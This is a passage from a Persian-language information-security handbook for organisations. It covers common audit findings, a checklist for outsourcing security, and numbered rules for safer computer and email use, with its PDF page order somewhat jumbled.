ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺍﮔـﺮ ﻣﺘﺨﻠﻔـﺎﻥ ﺑﺪﺍﻧﻨـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ
ﺟﺴﺘﺠﻮﻱ ﺁﻧﺎﻥ ﻫﺴﺘﻴﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻓﻌﺎﻟﻴـﺖ ﺧـﻮﺩ ﺭﺍ ﻣﺤـﺪﻭﺩ
ﻛﻨﻨﺪ.
ﻣﻌﻤﻮﻝﺗﺮﻳﻦ ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﺑﺎ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻤﻴـﺰﻱ ﺍﻣﻨﻴـﺖ ﻗﺎﺑـﻞ
ﺷﻨﺎﺳﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
•
•
•
•
•
ﻧﺼﺐ ﻧﺒﻮﺩﻥ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛
ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎ؛
ﺳﺎﺩﻩ ﻭ ﻗﺎﺑﻞ ﺣﺪﺱ ﺑﻮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ؛
ﻓﻌﺎﻝ ﺑﻮﺩﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻏﻴﺮﺿﺮﻭﺭﻱ؛ ﻭ
ﺭﻭﺷﻦ ﻧﺒﻮﺩﻥ ﻳﺎ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ.
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﺗﻌﻴﻴﻦ ﻳﻚ ﻣﺒﻨﺎ ﺑﺮﺍﻱ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ -ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺮﻛﺖ ﻭ ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ
ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ -ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ
ﻧﻬﺎﻳﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﺍﻣﺮ ﻭﺍﻗﻔﻴﻢ ﻛﻪ ﭘﻴﭽﻴﺪﮔﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧﺎﺭﺟﻲ ﻭﺍﺩﺍﺭ ﻛﻨﺪ .ﺩﺭ ﻓﺼﻠﻲ ﻛﻪ ﺑﻪ ﺍﻳـﻦ
ﻣﻔﻬﻮﻡ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﻜﺎﺕ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺩﺭ
ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻫﻤﻜﺎﺭ ،ﭼﮕـﻮﻧﮕﻲ ﻣـﺪﻳﺮﻳﺖ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺁﻥ ،ﻭ
ﺍﻳﻨﻜﻪ ﭼﻪ ﻫﻨﮕﺎﻡ ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﻧﺮﺍ ﺑﻪ ﺩﻗﺖ ﺯﻳـﺮ ﻧﻈـﺮ ﮔﺮﻓـﺖ
ﺑﺤﺚ ﻋﻤﻴﻘﻲ ﺻﻮﺭﺕ ﮔﺮﻓﺖ.
ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺖ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﻨﺒـﻊ ﺩﻳﮕـﺮ ﺑـﺮﺍﻱ
ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﻳﻚ ﭘﻴﻤﺎﻧﻜـﺎﺭ ﺧـﺎﺭﺟﻲ ﺟﻬـﺖ ﺍﻧﺠـﺎﻡ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ:
ﻓﻬﺮﺳــﺖ ﻛﻨﺘــﺮﻝ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨــﺎﺑﻊ ﺧــﺎﺭﺟﻲ ﺩﺭ
ﺍﻣﻨﻴﺖ) ١٩٥ﻣﻼﺣﻈﺎﺕ ﻓﻨﻲ(
•
ﺁﻳﺎ ﺍﺗﺼﺎﻻﺕ ﻣﻴﺎﻥ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ )ﺍﺗـﺼﺎﻻﺕ
ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ( ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺑﺎﺯﺑﻴﻨﻲ ﻣـﻲﺷـﻮﺩ؟ ﻫـﺮ
ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟
۱۹۴ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﻧﻬﻢ ،ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ،ﺹ ۱۳۳
۱۹۵ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﻧﻬﻢ ،ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ،ﺹ ۱۳۳
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻪ ﺷﺒﻜﺔ ﺷﻤﺎ
ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ ،ﻳﻚ ﻣﻌﻤﺎﺭﻱ ﺭﺳﻤﻲ ﻭﺟﻮﺩ
ﺩﺍﺭﺩ؟
•
ﺁﻳﺎ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲ ﺑـﺮﺍﻱ ﺗﻌﻴـﻴﻦ ﺍﻳﻨﻜـﻪ ﺍﺗـﺼﺎﻝ ﺍﺯ
ﺷﺒﻜﺔ ﺧﺎﺭﺟﻲ ﺩﺭ ﭼﻪ ﺯﻣﺎﻧﻲ ،ﺗﺤﺖ ﭼﻪ ﺷـﺮﺍﻳﻄﻲ ،ﻭ ﺑـﻪ
ﭼﻪ ﺻﻮﺭﺗﻲ ﻣﺠﺎﺯ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
•
ﺁﻳﺎ ﺁﻏﺎﺯ ﺷﺪﻥ ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﺯ ﺷﺒﻜﻪ ﺧﺎﺭﺟﻲ ،ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻳﻴﺪ
ﻣﺪﻳﺮﻳﺖ ﺩﺍﺭﺩ؟
•
ﺁﻳﺎ ﭘﻴﺶ ﺍﺯ ﺍﺗﺼﺎﻝ ﻳﻚ ﺷـﺒﻜﺔ ﺧـﺎﺭﺟﻲ ،ﺍﻧﺠـﺎﻡ ﻧـﻮﻋﻲ
ﺑﺎﺯﺑﻴﻨﻲ ﺭﺳﻤﻲ ﺍﻟﺰﺍﻣﻲ ﺍﺳﺖ؟
٢٠٣
ﺑﺨﺶ ﺳﻮﻡ
٢٠٥
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ ﺩﻭﺍﺯﺩﻫﻢ
ﻗﻮﺍﻋﺪ ﺍﻳﻤﻨﻲ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺑﺮﺍﻱ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ
ﭼﻬﺎﺭ ﮔﺎﻡ ﺁﺳﺎﻥ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ ﺍﻣﻦﺗﺮ
.۱
ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ
ﻭﺍﺟﺪ ﭼﻪ ﺩﺭﺟﻪﺍﻱ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ .ﺍﮔـﺮ ﻓﻜـﺮ
ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ ﻭ
ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺩﭼﺎﺭ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ
ﺧﻮﺍﻫﻴﺪ ﺷﺪ ،ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻭﻟﻮﻳـﺖ ﻛـﺎﻓﻲ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺍﮔﺮ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑـﺮﻭﺯ ﻣـﺸﻜﻼﺕ
ﺍﻣﻨﻴﺘﻲ ،ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ ﭘﺮﻛـﺎﺭ ﻛـﻪ ﻫـﻴﭻ ﺁﻣـﻮﺯﺵ
ﺭﺳﻤﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﻧﺪﻳﺪﻩ ﺍﺳﺘﻔﺎﺩﺓ ﭘﺎﺭﻩﻭﻗـﺖ ﻛﻨﻴـﺪ،
ﺑﺪﻭﻥ ﺷﻚ ﺑﻪ ﺍﺳﺘﻘﺒﺎﻝ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻓﺘﻪﺍﻳﺪ.
.۲
ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﺁﻣﻮﺯﺵ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺭﻭﺍﻟﻬـﺎ
ﺩﺧﺎﻟﺖ ﺩﻫﻴﺪ .ﺁﻳـﺎ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ
ﻧﺎﺷﻲ ﺍﺯ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ )ﻭ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻋﻤﻠﻜﺮﺩﻫـﺎﻳﻲ ﺍﺯ ﻧﻈـﺮ
ﺍﻣﻨﻴﺘﻲ ﺿﻌﻴﻒ ﻫﺴﺘﻨﺪ( ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧـﺪ؟ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺻـﻮﺭﺕ
ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻣﻮﺭﺩ ﻏﻴﺮﻋﺎﺩﻱ ﻳﺎ ﻣﺸﻜﻮﻙ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ
ﭼﻪ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﭼﻪ ﻛﺴﻲ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ .ﺗﻬﻴﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ
ﺁﻣﻮﺯﺷﻲ ﻣﻨﺎﺳﺐ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ
ﻗﺴﻤﺘﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺗـﺪﺍﻓﻌﻲ ﺷـﻤﺎ ﺗﺒـﺪﻳﻞ ﻛﻨـﺪ .ﻧﺎﺁﮔـﺎﻩ
ﻧﮕﻬﺪﺍﺷﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎ ﻭ ﻋﻤﻠﻜـﺮﺩ
ﺳﻴﺴﺘﻢ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ﻧﻤﻲﮔﺮﺩﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ
ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﮕـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻣﻬﺎﺟﻤﺎﻥ ﻣﺼﻤﻢ ﺑﺎﺷﺪ.
.۴
ﺷﻜﺎﻙ ﻭ ﻛﻨﺠﻜﺎﻭ ﺑﺎﺷﻴﺪ .ﭼﻨﺎﻧﭽﻪ ﺍﺗﻔﺎﻗﻲ ﺍﻓﺘﺎﺩ ﻛـﻪ
ﺑﻪ ﻧﻈﺮ ﻏﻴﺮﻣﻌﻤﻮﻝ ﻣﻲﻧﻤﻮﺩ ،ﺑﻪ ﻭﺟﻮﺩ ﻣﻬﺎﺟﻢ ﺷﻚ ﻛﻨﻴﺪ
ﻻ ﺩﺭ ﺧﻮﺍﻫﻴـﺪ
ﻭ ﺩﺭ ﺁﻥ ﻣﻮﺭﺩ ﺑﻪ ﺑﺮﺭﺳﻲ ﺑﭙﺮﺩﺍﺯﻳﺪ .ﻣﻌﻤـﻮ ﹰ
ﻳﺎﻓﺖ ﻛﻪ ﻣﺸﻜﻞ ﺍﺯ ﻳﻚ ﺍﺷـﺘﺒﺎﻩ ﻭ ﻳـﺎ ﻳـﻚ ﺍﺷـﻜﺎﻝ ﺩﺭ
ﺭﻭﺵ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻣﻨﺒﻊ ﺑﻮﺩﻩ ﺍﺳﺖ .ﺍﻣﺎ ﺑﺮﺧـﻲ ﻣﻮﺍﻗـﻊ
ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﻜﻞ ﺟﺪﻱﺗﺮﻱ ﭘﻴﺪﺍ ﺷﻮﺩ .ﺑﻪ ﻫﻤـﻴﻦ
ﺩﻟﻴﻞ ﻫﺮﮔﺎﻩ ﻣﺴﺌﻠﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻗﺎﺩﺭ ﺑـﻪ ﺣﻼﺟـﻲ
ﺩﻗﻴﻖ ﺁﻥ ﻧﻴﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻧﺴﺒﺖ ﺑﻪ ﺍﻣﻨﻴﺘـﻲ ﺑـﻮﺩﻥ ﻣـﺸﻜﻞ
ﻣﻈﻨﻮﻥ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﻗﺎﻋﺪﺓ ﺧﺎﺹ ﺩﻳﮕﺮ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦﺗﺮ ﺍﺯ ﺭﺍﻳﺎﻧﻪ
ﻗﺎﻋﺪﺓ .۱ﭘــﻴﺶ ﺍﺯ ﻭﻗــﻮﻉ ﺳــﺮﻗﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺭ ﻣــﻮﺭﺩ ﺁﻥ
ﺑﻴﺎﻧﺪﻳﺸﻴﺪ.
ﻗﺎﻋﺪﺓ .۲ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﻣﻄﻤـﺌﻦ
ﺷﻮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻬﺪﻳﺪ ﻓﻴﺰﻳﻜﻲ ﺭﺍﻳﺎﻧﻪ ،ﺑـﻪ ﺁﻧﻬـﺎ
ﺁﺳﻴﺒﻲ ﻭﺍﺭﺩ ﻧﻤﻲﺷﻮﺩ ﻭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﻗﺎﻋﺪﺓ .۳ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﺍﻧﺘﺨــﺎﺏ ﻛﻨﻴــﺪ ﻛــﻪ
ﺑﺴﺎﺩﮔﻲ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳـﺎﺩ ﺑﻴﺎﻭﺭﻳـﺪ ﺍﻣـﺎ ﺣـﺪﺱ
ﺯﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﻣﺸﻜﻞ ﺑﺎﺷﺪ.
ﻗﺎﻋﺪﺓ .۴ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺧﻮﺩ ﺭﺍ ﻫﻤﻮﺍﺭﻩ
ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﻗﺎﻋﺪﺓ .۵ﺑﺮﻧﺎﻣــﺔ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺧــﻮﺩ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ
ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻨﻴــﺪ ﻛــﻪ ﺿــﻤﻴﻤﻪﻫــﺎ ١٩٦ﺭﺍ ﺑــﺼﻮﺭﺕ
ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ.
ﻗﺎﻋﺪﺓ .۶ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﻧﻮﻉ ﺿﻤﻴﻤﺔ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ،
ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ
ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ.
196 Attachment
ﺑﺨﺶ ﺳﻮﻡ
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻣﺴﺘﻠﺰﻡ ﺗﻼﺵ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ
ﺍﺳﺖ .ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﺍﺕ ﻭ ﺗﺤﻠﻴـﻞ ﺳـﻮﺩ ﻭ
ﺯﻳﺎﻥ ﻭﻗﺖ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻳﺪ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﺩﺳﺖﻛﻢ ﭼﻬﺎﺭ ﻣﺮﺣﻠـﺔ
ﺳﺎﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ:
.۳
ﺑﺮﺍﻱ ﺗﻬﻴﻪ ﻭ ﺫﺧﻴﺮﺓ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻳـﻚ
ﻃﺮﺡ ﻣﺸﺮﻭﺡ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ .ﺑﺎﻳـﺪ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻞ
ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﻧﻴﺰ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺗـﺎ
ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﻓﺠﺎﻳﻊ ﺟﺪﻱ ﻫﻢ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ
ﻣﺠﺪﺩﹰﺍ ﺑﺎﺯﺳﺎﺯﻱ ﻛﻨﻴﺪ.
٢٠٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻗﺎﻋﺪﺓ .۷ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺿﻤﻴﻤﻪﺍﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﻳﻚ ﻏﺮﻳﺒﻪ ﺩﺭﻳﺎﻓﺖ
ﻛﺮﺩﻩ ﺍﻳﺪ ﺑﺎﺯ ﻧﻜﻨﻴﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻓﺎﻳـﻞ
ﻣﺮﺑﻮﻃﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﺎﺷﺪ.
ﻗﺎﻋﺪﺓ .۸ﺍﺯ ﮔﺸﻮﺩﻥ ﺿﻤﻴﻤﻪﺍﻱ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻳﻚ ﻓﺮﺩ ﺁﺷـﻨﺎ ﻭ
ﻣﻄﻤﺌﻦ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻫﻢ ﭘﺮﻫﻴﺰ ﻛﻨﻴﺪ ،ﻣﮕـﺮ ﺁﻧﻜـﻪ
ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﮔﺎﻫﺎﻧﻪ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۹ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ
ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻔﻨﻨﻲ ١٩٧HTMLﺭﺍ ﭘـﺮﺩﺍﺯﺵ
ﻧﻜﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ.
ﻗﺎﻋﺪﺓ .۱۰ﺍﺯ ISPﺧﻮﺩ ﺑﭙﺮﺳﻴﺪ ﻛﻪ ﺁﻳﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ
ﭘــﻴﺶ ﺍﺯ ﺗﺤﻮﻳــﻞ ﺑــﻪ ﺷــﻤﺎ ﺍﺯ ﻧﻈــﺮ ﻭﻳــﺮﻭﺱ ﻭ ﻳــﺎ
ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ.
ﻗﺎﻋﺪﺓ .۱۱ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻫﺎﻱ ﻭﺏ ﺍﻣﻜـﺎﻥ downloadﻭ ﺍﺟـﺮﺍﻱ
ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﺸﻜﻠـﺴﺎﺯ ﺑﺎﺷـﻨﺪ ﺭﺍ
ﻧﺪﻫﻴﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷـﻴﺪ ﭘﺎﻳﮕـﺎﻩ ﻣﺮﺑﻮﻃـﻪ
ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۱۲ﻧﻤﺎﻳﺶ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻛـﻪ ﻣـﺮﻭﺭ ﻣـﻲﻛﻨﻴـﺪ ﻭ
ﺁﺩﺭﺳﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻴﺪ ﺭﺍ ﻓﻌـﺎﻝ
ﻛﻨﻴﺪ .ﻫﻤﭽﻨـﻴﻦ ﻫﻨﮕـﺎﻡ ﻣـﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻧﺎﺁﺷـﻨﺎ
ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺟـﺎﺯﺓ
ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﻫﻴﺪ.
ﻗﺎﻋﺪﺓ .۱۳ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ cookieﻫﺎ ﺗﺤﺖ ﭼﻪ ﺷﺮﺍﻳﻄﻲ ﺩﺭ
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ .ﺍﮔﺮ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﺁﻧﻬـﺎ
ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ
